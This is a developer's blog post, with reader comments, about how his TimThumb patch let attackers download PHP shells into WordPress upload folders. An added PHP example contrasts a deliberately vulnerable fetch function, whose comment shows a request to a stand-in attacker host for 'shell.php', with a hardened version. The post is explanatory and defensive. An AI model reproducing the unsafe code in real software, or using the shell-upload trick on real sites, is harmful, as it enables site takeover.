That Time I Brought Down Millions of WordPress Sites

I’m going to take you guys back to a time when I was doing some client work.

I was at the time working on becoming a somebody in the WP Dev community. I attached myself to a really awesome designer, George Wiscombe, and started working on a theme he designed called Handgloves. I began by widgetizing it (which was just starting to catch on — that probably dates me a little), then added a couple of built-in social media hooks. I emailed him and told him I was working on it, and he released my changes, and because he is an AWESOME dude, gave me a byline on it.

We (Humankind) had a client that wanted a WordPress Multi-User (yep, before multi-site — dating myself yet again) installation for their interior design network, with an asset catalog that lived under the main root, but all the designers’ sites as sub-domains. We ran into a little problem: Handgloves used TimThumb, and TimThumb’s WordPress implementation at the time had a small problem. It was hard-coded to use only the local uploads folder, by prepending the website URL to the uploads directory and then appending the image name.

I decided to do a quick fix for this, and post it up on my old personal blog. I allowed you to pass either the image name or a full URL with scheme. If a full URL was passed, it would download the image locally into your uploads folder.

Problem Solved! (Or So I thought)

I posted my change up to Binary Moon, linking back to my personal blog, with a small caveat – “I haven’t tested this, and there are probably gaping holes in it.”

Within a week, my blog was seeing a few hundred hits per day all for TimThumb, and that was awesome. I think my change was eventually merged into the main TimThumb library, since my traffic died down after a few months (I don’t know that for a fact).

The client had eventually decided that in order to preserve backlink juice, the site shouldn’t have sub-domains, but live under sub-folders, and I forgot about TimThumb for the time being.

Many Months (or a Year?) Later

That gaping hole that I warned might be in my super shitty code… Well, there it was. Millions of sites had been affected.

The exploit used my cross-domain TimThumb (which had already been patched by that time, but who actually downloads new versions of PHP scripts?) to download PHP scripts from other websites, and thanks to my addition to the code, it would store them locally in the uploads directory.

So a hacker would find a website using TimThumb, then send it a request whose image URL pointed at a PHP script on a server they controlled. Once TimThumb downloaded the script and stored it in the uploads directory, the hacker would request that file by its URL, the web server would execute it as PHP, and they owned the site. Having an up-to-date WordPress or TimThumb, or basic permission settings that stopped PHP from executing out of the uploads folder, would have prevented every one of the attacks, but that is the nature of the internet. No one ever patches their servers, and random people who download a script never sign up for notifications of new versions or anything.
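To make the failure mode concrete, here is an added example (not TimThumb's code, and not the author's patch) showing the fetch-and-store logic described above in its dangerous form next to a hardened form. The function names, the `$uploadsDir` parameter and the 5 MB size cap are assumptions for illustration; the point is that the unsafe version writes whatever the remote host returns under a name the attacker chose, while the safe version validates the bytes and decides the stored name and extension itself.

```php
<?php
// Added example, not TimThumb's code: the remote-fetch logic in its
// dangerous form and a hardened form. Function names, $uploadsDir and
// the size cap are assumptions for illustration.

declare(strict_types=1);

// DANGEROUS: whatever the remote host returns is written into the
// web-served uploads directory under a filename taken from the URL.
// A request with src=http://attacker.example/shell.php leaves
// uploads/shell.php on disk; visiting that path runs it as PHP.
function fetchRemoteImageUnsafe(string $src, string $uploadsDir): string
{
    $data = file_get_contents($src);                           // any scheme, any size
    $name = basename((string) parse_url($src, PHP_URL_PATH));  // attacker picks ".php"
    $dest = $uploadsDir . '/' . $name;
    file_put_contents($dest, $data);
    return $dest;
}

// HARDENED: restrict the scheme, cap the download, trust the bytes rather
// than the URL or the Content-Type header, and pick the stored name and
// extension ourselves so nothing ever lands with a runnable extension.
function fetchRemoteImageSafe(string $src, string $uploadsDir): string
{
    $maxBytes = 5 * 1024 * 1024; // assumed cap for an image worth thumbnailing

    $scheme = strtolower((string) parse_url($src, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('only http/https sources are allowed');
    }

    $ctx = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    // Read one byte past the cap so an oversize body is rejected, not silently truncated.
    $data = file_get_contents($src, false, $ctx, 0, $maxBytes + 1);
    if ($data === false || strlen($data) > $maxBytes) {
        throw new RuntimeException('fetch failed or body exceeds size cap');
    }

    // The bytes must parse as an image; a bare PHP script will not.
    $info = @getimagesizefromstring($data);
    $extByType = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    if ($info === false || !isset($extByType[$info[2]])) {
        throw new RuntimeException('remote body is not a supported image');
    }

    // Content-addressed name, extension from the detected type. Even a
    // polyglot that is both a valid GIF and PHP source is stored as .gif,
    // which the web server serves as bytes instead of executing.
    $dest = $uploadsDir . '/' . hash('sha256', $data) . '.' . $extByType[$info[2]];
    if (file_put_contents($dest, $data, LOCK_EX) === false) {
        throw new RuntimeException('could not write ' . $dest);
    }
    return $dest;
}
```

The image check alone is not the real protection, since an attacker can craft a file that is simultaneously a valid image and PHP source; controlling the extension is what keeps the server from ever executing it. The "basic permission settings" mentioned above are the independent second layer: for example, on Apache with mod_php, an `.htaccess` in the uploads directory containing `php_flag engine off` means that even a stray `.php` file written there is served as text rather than run.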

Many millions of websites were affected by this, and once Google found the exploit, they started blocking most sites that could be hijacked like this from search results and from the Chrome browser.

And that was how I brought down millions of websites.

Have you ever had such a negative impact on such a large scale before? Leave a comment!

18 thoughts on “That Time I Brought Down Millions of WordPress Sites”

  1. Happened to me in 2001, with the world’s first social network (~7 years before the term “social network” came to life). Learned from it, never happened again.

  2. I remember having problems with three websites at the time due to TimThumb implemented in one theme. Ha! This gave me a lot of headaches for some days!

  3. OpenX, the ad serving platform, had a known exploit (5+ years ago) that allowed uploading of arbitrary scripts. The script that was generally uploaded was a big sophisticated one. It allowed control over most of the site processes and adserving, allowing the serving of malicious software as advert content.

    1. Why did it take so long to get fixed? I would expect an exploit at the service level like that should have been patched within a few hours of it being known. Unless it required a fundamental rethinking of how it serves ads (manual review, etc).

  4. Oh man, nice to meet the person who kept me up for nights fixing my clients’ websites. Since then, I have made changes to the way I work and I have to thank you for that… 🙂